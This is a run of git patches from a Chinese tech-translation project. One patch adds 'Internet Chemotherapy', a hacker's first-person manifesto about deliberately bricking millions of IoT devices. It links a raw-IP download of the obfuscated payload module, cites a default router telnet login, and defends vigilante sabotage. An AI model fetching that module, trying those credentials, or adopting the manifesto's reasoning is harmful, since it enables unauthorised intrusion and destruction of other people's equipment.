Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/Screenshot-2017-02-08-23.30.13.png?resize=1032%2C111&ssl=1) - -### 通过 Docker 更安全地使用应用程序 - -Docker 涉密数据旨在让开发人员和IT运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是是首个被设计为既能保持涉密数据安全又能仅在当被需要涉密数据操作的确切容器需要的使用的容器结构。从使用Docker Compose定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署 Compose 文件、涉密数据(涉密数据),networks 和卷 volumes 都将加密、安全地跟应用程序一起传输。 - -更多相关学习资源: - -* [1.13 Docker 数据中心具有 Secrets, 安全扫描、容量缓存等新特性][7] - -* [下载 Docker ][8] 且开始学习 - -* [在 Docker 数据中心尝试使用 secrets][9] - -* [阅读文档][10] - -* 参与 [即将进行的在线研讨会][11] - --------------------------------------------------------------------------------- - -via: https://blog.docker.com/2017/02/docker-secrets-management/ - -作者:[ Ying Li][a] -译者:[HardworkFish](https://github.com/HardworkFish) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://blog.docker.com/author/yingli/ -[1]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management&summary=Containers%20are%20changing%20how%20we%20view%20apps%20and%20infrastructure.%20Whether%20the%20code%20inside%20containers%20is%20big%20or%20small,%20container%20architecture%20introduces%20a%20change%20to%20how%20that%20code%20behaves%20with%20hardware%20-%20it%20fundamentally%20abstracts%20it%20from%20the%20infrastructure.%20Docker%20believes%20that%20there%20are%20three%20key%20components%20to%20container%20security%20and%20... -[2]:http://www.reddit.com/submit?url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management -[3]:https://plus.google.com/share?url=http://dockr.ly/2k6gnOB -[4]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2k6gnOB&t=Introducing%20Docker%20Secrets%20Management -[5]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB -[6]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB -[7]:http://dockr.ly/AppSecurity -[8]:https://www.docker.com/getdocker -[9]:http://www.docker.com/trial -[10]:https://docs.docker.com/engine/swarm/secrets/ -[11]:http://www.docker.com/webinars -[12]:https://blog.docker.com/author/yingli/ -[13]:https://blog.docker.com/tag/container-security/ -[14]:https://blog.docker.com/tag/docker-security/ -[15]:https://blog.docker.com/tag/secrets-management/ -[16]:https://blog.docker.com/tag/security/ -[17]:https://docs.docker.com/engine/swarm/how-swarm-mode-works/pki/ -[18]:https://docs.docker.com/engine/swarm/secrets/ -[19]:https://lvh.io%29/ From 8c98845be6c2158fa02b1227722d91e37ebed909 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AD=91=E9=AD=85=E9=AD=8D=E9=AD=89?= <625310581@qq.com> Date: Sun, 17 Dec 2017 22:49:19 +0800 Subject: [PATCH 0670/1627] apply for translation --- sources/tech/20171215 Linux Vs Unix.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171215 Linux Vs Unix.md b/sources/tech/20171215 Linux Vs Unix.md index 9b5cd0b104..40c411051b 100644 --- a/sources/tech/20171215 Linux Vs Unix.md +++ b/sources/tech/20171215 Linux Vs Unix.md @@ -1,4 +1,6 @@ + translating by HardworkFish + [![Linux vs. Unix](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/unix-vs-linux_orig.jpg)][1] ​In computer time, a substantial part of the population has a misconception that the **Unix** and **Linux** operating systems are one and the same. However, the opposite is true. Let's look at it from a closer look. From 589818c9a487d89cc796c0f475f3dd7d2272c8dd Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 18 Dec 2017 00:04:38 +0800 Subject: [PATCH 0671/1627] PRF&PUB:20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md @geekpi --- ...s It Easier to Test Drive Linux Distros.md | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) rename {translated/tech => published}/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md (69%) diff --git a/translated/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md b/published/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md similarity index 69% rename from translated/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md rename to published/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md index b32d1a3943..4b32fbf647 100644 --- a/translated/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md +++ b/published/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md @@ -1,26 +1,25 @@ -# GNOME Boxes 使得测试 Linux 发行版更加简单 +GNOME Boxes 使得测试 Linux 发行版更加简单 +============== ![GNOME Boxes Distribution Selection](http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/GNOME-Boxes-INstall-Distros-750x475.jpg) -在 GNOME 桌面上创建 Linux 虚拟机即将变得更加简单。 +> 在 GNOME 桌面上创建 Linux 虚拟机即将变得更加简单。 -[_GNOME Boxes_][5] 的下一个主要版本能够直接在应用程序内下载流行的 Linux(和基于 BSD 的)操作系统。 +[GNOME Boxes][5] 的下一个主要版本能够直接在应用程序内下载流行的 Linux(和基于 BSD 的)操作系统。 -Boxes 是免费的开源软件。它可以用来访问远程和虚拟系统,因为它是用 [QEMU][6]、KVM 和 libvirt 虚拟化技术构建的。 +Boxes 是自由开源软件。它可以用来访问远程和虚拟系统,因为它是用 [QEMU][6]、KVM 和 libvirt 虚拟化技术构建的。 对于新的 ISO-toting 的集成,_Boxes_ 利用 [libosinfo][7] 这一操作系统的数据库,该数据库还提供了有关任何虚拟化环境要求的详细信息。 -在 GNOME 开发者 Felipe Borges 的[这个(起错标题)视频] [8]中,你可以看到改进的“源选择”页面,包括为给定的发行版下载特定 ISO 架构的能力: +在 GNOME 开发者 Felipe Borges 的[这个(起错标题的)视频] [8]中,你可以看到改进的“源选择”页面,包括为给定的发行版下载特定架构的 ISO 的能力: [video](https://youtu.be/CGahI05Gbac) 尽管它是一个核心 GNOME 程序,我不得不承认,我从来没有使用过 Boxes。(我这么做)并不是说我没有听到有关它的好处,只是我更熟悉在 VirtualBox 中设置和配置虚拟机。 -> “我内心的偷懒精神会欣赏这个集成” - 我承认在浏览器中下载一个 ISO 然后将虚拟机指向它(见鬼,这是我们大多数在过去十年来一直做的事)并不是一件很_困难_的事。 -但是我内心的偷懒精神会欣赏这个集成。 +但是我内心的偷懒精神会欣赏这种集成。 所以,感谢这个功能,我将在明年 3 月份发布 GNOME 3.28 时,在我的系统上解压 Boxes。我会启动 _Boxes_,闭上眼睛,随意从列表中挑选一个发行版,并立即拓宽我的视野。 @@ -28,9 +27,9 @@ Boxes 是免费的开源软件。它可以用来访问远程和虚拟系统, via: http://www.omgubuntu.co.uk/2017/12/gnome-boxes-install-linux-distros-directly -作者:[ JOEY SNEDDON ][a] +作者:[JOEY SNEDDON][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From b063377512df3dae450e281bfbc5528610237a6e Mon Sep 17 00:00:00 2001 From: XiaochenCui Date: Mon, 18 Dec 2017 00:19:11 +0800 Subject: [PATCH 0672/1627] Add translating infomation --- sources/tech/20171211 A tour of containerd 1.0.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171211 A tour of containerd 1.0.md b/sources/tech/20171211 A tour of containerd 1.0.md index 0c260af9bf..64f4c1dbde 100644 --- a/sources/tech/20171211 A tour of containerd 1.0.md +++ b/sources/tech/20171211 A tour of containerd 1.0.md @@ -1,5 +1,6 @@ A tour of containerd 1.0 ====== +XiaochenCui translating ![containerd][1] From 599573fa5fe75f9716d83fded0d9935289424fab Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Sun, 17 Dec 2017 15:37:16 -0500 Subject: [PATCH 0673/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Internet=20Chem?= =?UTF-8?q?otherapy?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tech/20171218 Internet Chemotherapy.md | 335 ++++++++++++++++++ 1 file changed, 335 insertions(+) create mode 100644 sources/tech/20171218 Internet Chemotherapy.md diff --git a/sources/tech/20171218 Internet Chemotherapy.md b/sources/tech/20171218 Internet Chemotherapy.md new file mode 100644 index 0000000000..ffe15fb5c1 --- /dev/null +++ b/sources/tech/20171218 Internet Chemotherapy.md @@ -0,0 +1,335 @@ +Internet Chemotherapy +====== + +12/10 2017 + +### 1. Internet Chemotherapy + +Internet Chemotherapy was a 13 month project between Nov 2016 - Dec 2017. +It has been known under names such as 'BrickerBot', 'bad firmware +upgrade', 'ransomware', 'large-scale network failure' and even +'unprecedented terrorist actions.' That last one was a little harsh, +Fernandez, but I guess I can't please everybody. + +You can download the module which executes the http and telnet-based +payloads from this router at http://91.215.104.140/mod_plaintext.py. Due to +platform limitations the module is obfuscated single threaded python, but +the payloads are in plain view and should be easy to figure out for any +programmer worth his/her/hir salt. Take a look at the number of payloads, +0-days and techniques and let the reality sink in for a moment. Then +imagine what would've happened to the Internet in 2017 if I had been a +blackhat dedicated to building a massive DDoS cannon for blackmailing the +biggest providers and companies. I could've disrupted them all and caused +extraordinary damage to the Internet in the process. + +My ssh crawler is too dangerous to publish. It contains various levels of +automation for the purpose of moving laterally through poorly designed +ISP networks and taking them over through only a single breached router. +My ability to commandeer and secure hundreds of thousands of ISP routers +was the foundation of my anti-IoT botnet project as it gave me great +visibility of what was happening on the Internet and it gave me an +endless supply of nodes for hacking back. I began my non-destructive ISP +network cleanup project in 2015 and by the time Mirai came around I was +in a good position to react. The decision to willfully sabotage other +people's equipment was nonetheless a difficult one to make, but the +colossally dangerous CVE-2016-10372 situation ultimately left me with no +other choice. From that moment on I was all-in. + +I am now here to warn you that what I've done was only a temporary band- +aid and it's not going to be enough to save the Internet in the future. +The bad guys are getting more sophisticated, the number of potentially +vulnerable devices keep increasing, and it's only a matter of time before +a large scale Internet-disrupting event will occur. If you are willing to +believe that I've disabled over 10 million vulnerable devices over the 13- +month span of the project then it's not far-fetched to say that such a +destructive event could've already happened in 2017. + +YOU SHOULD WAKE UP TO THE FACT THAT THE INTERNET IS ONLY ONE OR TWO +SERIOUS IOT EXPLOITS AWAY FROM BEING SEVERELY DISRUPTED. The damage of +such an event is immeasurable given how digitally connected our societies +have become, yet CERTs, ISPs and governments are not taking the gravity +of the situation seriously enough. ISPs keep deploying devices with +exposed control ports and although these are trivially found using +services like Shodan the national CERTs don't seem to care. A lot of +countries don't even have CERTs. Many of the world's biggest ISPs do not +have any actual security know-how in-house, and are instead relying on +foreign vendors for help in case anything goes wrong. I've watched large +ISPs withering for months under conditioning from my botnet without them +being able to fully mitigate the vulnerabilities (good examples are BSNL, +Telkom ZA, PLDT, from time to time PT Telkom, and pretty much most large +ISPs south of the border). Just look at how slow and ineffective Telkom +ZA was in dealing with its Aztech modem problem and you will begin to +understand the hopelessness of the current situation. In 99% of the +problem cases the solution would have simply been for the ISPs to deploy +sane ACLs and CPE segmentation, yet months later their technical staff +still hasn't figured this out. If ISPs are unable to mitigate weeks and +months of continuous deliberate sabotage of their equipment then what +hope is there that they would notice and fix a Mirai problem on their +networks? Many of the world's biggest ISPs are catastrophically negligent +and this is the biggest danger by a landslide, yet paradoxically it +should also be the easiest problem to fix. + +I've done my part to try to buy the Internet some time, but I've gone as +far as I can. Now it's up to you. Even small actions are important. Among +the things you can do are: + +* Review your own ISP's security through services such as Shodan and take + them to task over exposed telnet, http, httpd, ssh, tr069 etc. ports on + their networks. Refer them to this document if you have to. There's no + good reason why any of these control ports should ever be accessible + from the outside world. Exposing control ports is an amateur mistake. + If enough customers complain they might actually do something about it! + +* Vote with your wallet! Refuse to buy or use 'intelligent' products + unless the manufacturer can prove that the product can and will receive + timely security updates. Find out about the vendor's security track + record before giving them your hard-earned money. Be willing to pay a + little bit more for credible security. + +* Lobby your local politicians and government officials for improved + security legislation for IoT (Internet of Things) devices such as + routers, IP cameras and 'intelligent' devices. Private or public + companies currently lack the incentives for solving this problem in the + immediate term. This matter is as important as minimum safety + requirements for cars and general electrical appliances. + +* Consider volunteering your time or other resources to underappreciated + whitehat organizations such as GDI Foundation or Shadowserver + Foundation. These organizations and people make a big difference and + they can significantly amplify the impact of your skillset in helping + the Internet. + +* Last but not least, consider the long-shot potential of getting IoT + devices designated as an 'attractive nuisance' through precedent- + setting legal action. If a home owner can be held liable for a + burglar/trespasser getting injured then I don't see why a device owner + (or ISP or manufacturer) shouldn't be held liable for the damage that + was caused by their dangerous devices being exploitable through the + Internet. Attribution won't be a problem for Layer 7 attacks. If any + large ISPs with deep pockets aren't willing to fund such precedent + cases (and they might not since they fear that such precedents could + come back to haunt them) we could even crowdfund such initiatives over + here and in the EU. ISPs: consider your volumetric DDoS bandwidth cost + savings in 2017 as my indirect funding of this cause and as evidence + for its potential upside. + +### 2. Timeline + +Here are some of the more memorable events of the project: + +* Deutsche Telekom Mirai disruption in late November 2016. My hastily + assembled initial TR069/64 payload only performed a 'route del default' + but this was enough to get the ISP's attention to the problem and the + resulting headlines alerted other ISPs around the world to the + unfolding disaster. + +* Around January 11-12 some Mirai-infected DVRs with exposed control port + 6789 ended up getting bricked in Washington DC, and this made numerous + headlines. Gold star to Vemulapalli for determining that Mirai combined + with /dev/urandom had to be 'highly sophisticated ransomware'. Whatever + happened to those 2 unlucky souls in Europe? + +* In late January 2017 the first genuine large-scale ISP takedown occured + when Rogers Canada's supplier Hitron carelessly pushed out new firmware + with an unauthenticated root shell listening on port 2323 (presumably + this was a debugging interface that they forgot to disable). This epic + blunder was quickly discovered by Mirai botnets, and the end-result was + a large number of bricked units. + +* In February 2017 I noticed the first Mirai evolution of the year, with + both Netcore/Netis and Broadcom CLI-based modems being attacked. The + BCM CLI would turn out to become one of the main Mirai battlegrounds of + 2017, with both the blackhats and me chasing the massive long tail of + ISP and model-specific default credentials for the rest of the year. + The 'broadcom' payloads in the above source may look strange but + they're statistically the most likely sequences to disable any of the + endless number of buggy BCM CLI firmwares out there. + +* In March 2017 I significantly increased my botnet's node count and + started to add more web payloads in response to the threats from IoT + botnets such as Imeij, Amnesia and Persirai. The large-scale takedown + of these hacked devices created a new set of concerns. For example, + among the leaked credentials of the Avtech and Wificam devices there + were logins which strongly implied airports and other important + facilities, and around April 1 2017 the UK government officials + warned of a 'credible cyber threat' to airports and nuclear + facilities from 'hacktivists.' Oops. + +* The more aggressive scanning also didn't escape the attention of + civilian security researchers, and in April 6 2017 security company + Radware published an article about my project. The company trademarked + it under the name 'BrickerBot.' It became clear that if I were to + continue increasing the scale of my IoT counteroffensive I had to come + up with better network mapping/detection methods for honeypots and + other risky targets. + +* Around April 11th 2017 something very unusual happened. At first it + started like so many other ISP takedowns, with a semi-local ISP called + Sierra Tel running exposed Zyxel devices with the default telnet login + of supervisor/zyad1234. A Mirai runner discovered the exposed devices + and my botnet followed soon after, and yet another clash in the epic + BCM CLI war of 2017 took place. This battle didn't last long. It + would've been just like any of the hundreds of other ISP takedowns in + 2017 were it not for something very unusual occuring right after the + smoke settled. Amazingly, the ISP didn't try to cover up the outage as + some kind of network issue, power spike or a bad firmware upgrade. They + didn't lie to their customers at all. Instead, they promptly published + a press release about their modems having been vulnerable which allowed + their customers to assess their potential risk exposure. What did the + most honest ISP in the world get for its laudable transparency? Sadly + it got little more than criticism and bad press. It's still the most + depressing case of 'why we can't have nice things' to me, and probably + the main reason for why 99% of security mistakes get covered up and the + actual victims get left in the dark. Too often 'responsible disclosure' + simply becomes a euphemism for 'coverup.' + +* On April 14 2017 DHS warned of 'BrickerBot Threat to Internet of + Things' and the thought of my own government labeling me as a cyber + threat felt unfair and myopic. Surely the ISPs that run dangerously + insecure network deployments and the IoT manufacturers that peddle + amateurish security implementations should have been fingered as the + actual threat to Americans rather than me? If it hadn't been for me + millions of us would still be doing their banking and other sensitive + transactions over hacked equipment and networks. If anybody from DHS + ever reads this I urge you to reconsider what protecting the homeland + and its citizens actually means. + +* In late April 2017 I spent some time on improving my TR069/64 attack + methods, and in early May 2017 a company called Wordfence (now Defiant) + reported a significant decline in a TR069-exploiting botnet that had + previously posed a threat to Wordpress installations. It's noteworthy + that the same botnet temporarily returned a few weeks later using a + different exploit (but this was also eventually mitigated). + +* In May 2017 hosting company Akamai reported in its Q1 2017 State of the + Internet report an 89% decrease in large (over 100 Gbps) DDoS attacks + compared with Q1 2016, and a 30% decrease in total DDoS attacks. The + largest attack of Q1 2017 was 120 Gbps vs 517 Gbps in Q4 2016. As large + volumetric DDoS was one of the primary signatures of Mirai this felt + like concrete justification for all the months of hard work in the IoT + trenches. + +* During the summer I kept improving my exploit arsenal, and in late July + I performed some test runs against APNIC ISPs. The results were quite + surprising. Among other outcomes a few hundred thousand BSNL and MTNL + modems were disabled and this outage become headline news in India. + Given the elevated geopolitical tensions between India and China at the + time I felt that there was a credible risk of the large takedown being + blamed on China so I made the rare decision to publically take credit + for it. Catalin, I'm very sorry for the abrupt '2 day vacation' that + you had to take after reporting the news. + +* Previously having worked on APNIC and AfriNIC, on August 9th 2017 I + also launched a large scale cleanup of LACNIC space which caused + problems for various providers across the subcontinent. The attack made + headlines in Venezuela after a few million cell phone users of Movilnet + lost service. Although I'm personally against government surveillance + of the Internet the case of Venezuela is noteworthy. Many of the + LACNIC ISPs and networks have been languishing for months under + persistent conditioning from my botnet, but Venezuelan providers have + been quick to fortify their networks and secure their infrastructure. + I believe this is due to Venezuela engaging in far more invasive deep + packet inspection than the other LACNIC countries. Food for thought. + +* In August 2017 F5 Labs released a report called "The Hunt for IoT: The + Rise of Thingbots" in which the researchers were perplexed over the + recent lull in telnet activity. The researchers speculated that the + lack of activity may be evidence that one or more very large cyber + weapons are being built (which I guess was in fact true). This piece + is to my knowledge the most accurate assessment of the scope of my + project but fascinatingly the researchers were unable to put two and + two together in spite of gathering all the relevant clues on a single + page. + +* In August 2017 Akamai's Q2 2017 State of the Internet report announces + the first quarter in 3 years without the provider observing a single + large (over 100 Gbps) attack, and a 28% decrease in total DDoS attacks + vs Q1 2017. This seems like further validation of the cleanup effort. + This phenomenally good news is completely ignored by the mainstream + media which operates under an 'if it bleeds it leads' mentality even + when it comes to information security. This is yet another reason why + we can't have nice things. + +* After the publication of CVE-2017-7921 and 7923 in September 2017 I + decided to take a closer look at Hikvision devices, and to my horror + I realized that there's a technique for botting most of the vulnerable + firmwares that the blackhats hadn't discovered yet. As a result I + launched a global cleanup initiative around mid-September. Over a + million DVRs and cameras (mainly Hikvision and Dahua) were disabled + over a span of 3 weeks and publications such as IPVM.com wrote several + articles about the attacks. Dahua and Hikvision wrote press releases + mentioning or alluding to the attacks. A huge number of devices finally + got their firmwares upgraded. Seeing the confusion that the cleanup + effort caused I decided to write a quick summary for the CCTV people at + http://depastedihrn3jtw.onion.link/show.php?md5=62d1d87f67a8bf485d43a05ec32b1e6f + (sorry for the NSFW language of the pastebin service). The staggering + number of vulnerable units that were online months after critical + security patches were available should be the ultimate wakeup call to + everyone about the utter dysfunctionality of the current IoT patching + process. + +* Around September 28 2017 Verisign releases a report saying that DDoS + attacks declined 55% in Q2 2017 vs Q1, with a massive 81% attack peak + decline. + +* On November 23rd 2017 the CDN provider Cloudflare reports that 'in + recent months, Cloudflare has seen a dramatic reduction in simple + attempts to flood our network with junk traffic.' Cloudflare speculates + it could've partly been due to their change in policies, but the + reductions also line up well with the IoT cleanup activities. + +* At the end of November 2017 Akamai's Q3 2017 State of the Internet + report sees a small 8% increase in total DDoS attacks for the quarter. + Although this was a significant reduction compared to Q3 2016 the + slight uptick serves as a reminder of the continued risks and dangers. + +* As a further reminder of the dangers a new Mirai strain dubbed 'Satori' + reared its head in November-December of 2017. It's particularly + noteworthy how quickly the botnet managed to grow based on a single + 0-day exploit. This event underlines the current perilous operating + state of the Internet, and why we're only one or two severe IoT + exploits away from widespread disruption. What will happen when nobody + is around to disable the next threat? Sinkholing and other whitehat/ + 'legal' mitigations won't be enough in 2018 just like they weren't + enough in 2016. Perhaps in the future governments will be able to + collaborate on a counterhacking task force with a global mandate for + disabling particularly severe existential threats to the Internet, but + I'm not holding my breath. + +* Late in the year there were also some hysterical headlines regarding a + new botnet that was dubbed 'Reaper' and 'IoTroop'. I know some of you + will eventually ridicule those who estimated its size at 1-2 million + but you should understand that security researchers have very limited + knowledge of what's happening on networks and hardware that they don't + control. In practice the researchers could not possibly have known or + even assumed that most of the vulnerable device pool had already been + disabled by the time the botnet emerged. Give the 'Reaper' one or two + new unmitigated 0-days and it'll become as terrifying as our worst + fears. + +### 3. Parting Thoughts + +I'm sorry to leave you in these circumstances, but the threat to my own +safety is becoming too great to continue. I have made many enemies. If +you want to help look at the list of action items further up. Good luck. + +There will also be those who will criticize me and say that I've acted +irresponsibly, but that's completely missing the point. The real point +is that if somebody like me with no previous hacking background was able +to do what I did, then somebody better than me could've done far worse +things to the Internet in 2017. I'm not the problem and I'm not here to +play by anyone's contrived rules. I'm only the messenger. The sooner you +realize this the better. + +-Dr Cyborkian a.k.a. janit0r, conditioner of 'terminally ill' devices. + +-------------------------------------------------------------------------------- + +via:https://ghostbin.com/paste/q2vq2 + +作者:janit0r +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译, +[Linux中国](https://linux.cn/) 荣誉推出 From c10e18acc3532da4c94fc863f9589164364c2fb0 Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Sun, 17 Dec 2017 14:49:02 -0500 Subject: [PATCH 0674/1627] Translated: The Most Famous Classic Text-based Adventure Game --- ...amous Classic Text-based Adventure Game.md | 116 ------------------ ...amous Classic Text-based Adventure Game.md | 115 +++++++++++++++++ 2 files changed, 115 insertions(+), 116 deletions(-) delete mode 100644 sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md create mode 100644 translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md diff --git a/sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md b/sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md deleted file mode 100644 index 898c3458ef..0000000000 --- a/sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md +++ /dev/null @@ -1,116 +0,0 @@ -yixunx translating -The Most Famous Classic Text-based Adventure Game -====== -**Colossal Cave Adventure** , also known as **ADVENT** , **Colossal Cave** , or **Adventure** , is a most popular text-based adventure game in the period of early 80s and late 90s. This game is also known to be historic first "interactive fiction" game. In 1976, a Programmer named **Will Crowther** wrote the early version of this game, and later a fellow programmer **Don Woods** improved the game with many features by adding scoring system, more fantasy characters and locations. This game is originally developed for **PDP-10** , a good-old giant Mainframe computer. Later, it was ported to normal home desktop computers like IBM PC and Commodore 64. The original game was written using Fortran, and later it was introduced in MS-DOS 1.0 in the early 1980s by Microsoft. - -![](https://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-1.jpeg) - -The **Adventure 2.5** final version released in 1995 has never been packaged for modern operating systems. It went nearly extinct. Thankfully, after several years the open source advocate **Eric Steven Raymond** has ported this classic game to modern operating systems with the permission from original authors. He open sourced this classic game and hosted the source code in GitLab with a new name **" open-adventure"**. - -The main objective of this game is to find a cave rumored to be filled with a lot of treasure and gold and get out of it alive. The player earns points as he moves around the imaginary cave. The total number of points is 430. This game is mainly inspired by the extensive knowledge of cave exploration of the original author **Will Crowther**. He had been actively exploring in caves, particularly Mammoth Cave in Kentucky. Since the game 's cave structured loosely around the Mammoth Cave, you may notice many similarities between the locations in the game and those in Mammoth Cave. - -### Installing Colossal Cave Adventure game - -Open-Adventure has been packaged for Arch based systems and is available in [**AUR**][1]. So, we can install it using any AUR helpers in Arch Linux and its variants such as Antergos, and Manjaro Linux. - -Using [**Pacaur**][2]: -``` -pacaur -S open-adventure -``` - -Using [**Packer**][3]: -``` -packer -S open-adventure -``` - -Using [**Yaourt**][4]: -``` -yaourt -S open-adventure -``` - -On other Linux distros, you might need to compile and install it from the source as described below. - -Install the perquisites first: - -On Debian and Ubuntu: -``` -sudo apt-get install python3-yaml libedit-dev -``` - -On Fedora: -``` -sudo dnf install python3-PyYAML libedit-devel -``` - -You can also use pip to install PyYAML: -``` -sudo pip3 install PyYAML -``` - -After installing the prerequisites, compile and install open-adventure from source as shown below: -``` -git clone https://gitlab.com/esr/open-adventure.git -``` -``` -make -``` -``` -make check -``` - -Finally, run 'advent' binary to play: -``` -advent -``` - -There is also an Android version of this game available in [**Google Play store**][5]. - -### How to play? - -To start the game, just type the following from Terminal: -``` -advent -``` - -You will see a welcome screen. Type "y" if you want instructions or type "n" to get into the adventurous trip. - -![][6] - -The game begins in-front of a small brick building. The player needs to direct the character with simple one or two word commands in simple English. To move your character, just type commands like **in** , **out** , **enter** , **exit** , **building** , **forest** , **east** , **west** , **north** , **south** , **up** , or **down**. You can also use one-word letters to specify the direction. Here are some one letters to direct the character to move: **N** , **S** , **E** , **W** , **NW** , **SE** , etc. - -For example, if you type **" south"** or simply **" s"** the character will go south side of the present location. Please note that the character will understand only the first five characters. So when you have to type some long words, such as **northeast** , just use NE (small or caps). To specify southeast use SE. To pick up an item, type **pick**. To exit from a place, type **exit**. To go inside the building or any place, type **in**. To exit from any place, type **exit** and so on. It also warns you if there are any danger along the way. Also you can interact with two-word commands like **" eat food"**, **" drink water"**, **" get lamp"**, **" light lamp"**, **" kill snake"** etc. You can display the help section at any time by simply typing "help". - -![][8] - -I spent my entire afternoon to see what is in this game. Oh dear, it was super fun, exciting, thrill and adventurous experience! - -![][9] - -I went into many levels and explored many locations along the way. I even got gold and was attacked by a snake and a dwarf once. I must admit that this game is really addictive and best time killer. - -If you left the cave safely with treasure, you win and you will get full credit to the treasure. You will also get partial credit just for locating the treasure. To end your adventure early, type **" quit"**. To suspend your adventure, type **" suspend"** (or "pause" or "save"). You can resume the adventure later. To see how well you're doing, type **" score"**. Please remember that you will lose points for getting killed, or for quitting. - -Have fun! Cheers! - - - --------------------------------------------------------------------------------- - -via: https://www.ostechnix.com/colossal-cave-adventure-famous-classic-text-based-adventure-game/ - -作者:[SK][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.ostechnix.com/author/sk/ -[1]:https://aur.archlinux.org/packages/open-adventure/ -[2]:https://www.ostechnix.com/install-pacaur-arch-linux/ -[3]:https://www.ostechnix.com/install-packer-arch-linux-2/ -[4]:https://www.ostechnix.com/install-yaourt-arch-linux/ -[5]:https://play.google.com/store/apps/details?id=com.ecsoftwareconsulting.adventure430 -[6]:https://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-2.png -[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-2.png -[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-3.png -[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-1.png diff --git a/translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md b/translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md new file mode 100644 index 0000000000..17dfb304a6 --- /dev/null +++ b/translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md @@ -0,0 +1,115 @@ +最有名的经典文字冒险游戏 +====== +**巨洞冒险Colossal Cave Adventure**,又名 **ADVENT**、**Clossal Cave** 或 **Adventure**,是八十年代初到九十年代末最受欢迎的基于文字的冒险游戏。这款游戏还作为史上第一款“互动小说interactive fiction”类游戏而闻名。在 1976 年,一个叫 **Will Crowther** 的程序员开发了这款游戏的一个早期版本,之后另一位叫 **Don Woods** 的程序员改进了这款游戏,为它添加了许多新元素,包括计分系统以及更多的幻想角色和场景。这款游戏最初是为 **PDP-10** 开发的,这是一个历史悠久的大型计算机。后来,它被移植到普通家用台式电脑上,比如 IBM PC 和 Commodore 64。游戏的最初版使用 Fortran 开发,之后在八十年代初它被微软加入到 MS-DOS 1.0 当中。 + +![](https://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-1.jpeg) + +1995 年发布的最终版本 **Adventure 2.5** 从来没有可用于现代操作系统的安装包。它已经几乎绝版。万幸的是,在多年之后身为开源运动提倡者的 **Eric Steven Raymond** 得到了原作者们的同意之后将这款经典游戏移植到了现代操作系统上。他把这款游戏开源并将源代码以 **”open-adventure“** 之名托管在 GitLab 上。 + +你在这款游戏的主要目标是找到一个传言中藏有大量宝藏和金子的洞穴并活着离开它。玩家在这个虚拟洞穴中探索时可以获得分数。一共可获得的分数是 430 点。这款游戏的灵感主要来源于原作者 **Will Crowther** 丰富的洞穴探索的经历。他曾经积极地在洞穴中冒险,特别是肯塔基州的猛犸洞Mammoth Cave。因为游戏中的洞穴结构大体基于猛犸洞,你也许会注意到游戏中的场景和现实中的猛犸洞的相似之处。 + +### 安装巨洞冒险 + +Open Adventure 在 [**AUR**][1] 上有面对 Arch 系列操作系统的安装包。所以我们可以在 Arch Linux 或者像 Antergos 和 Manjaro Linux 等基于 Arch 的发行版上使用任何 AUR 辅助程序安装这款游戏。 + +使用 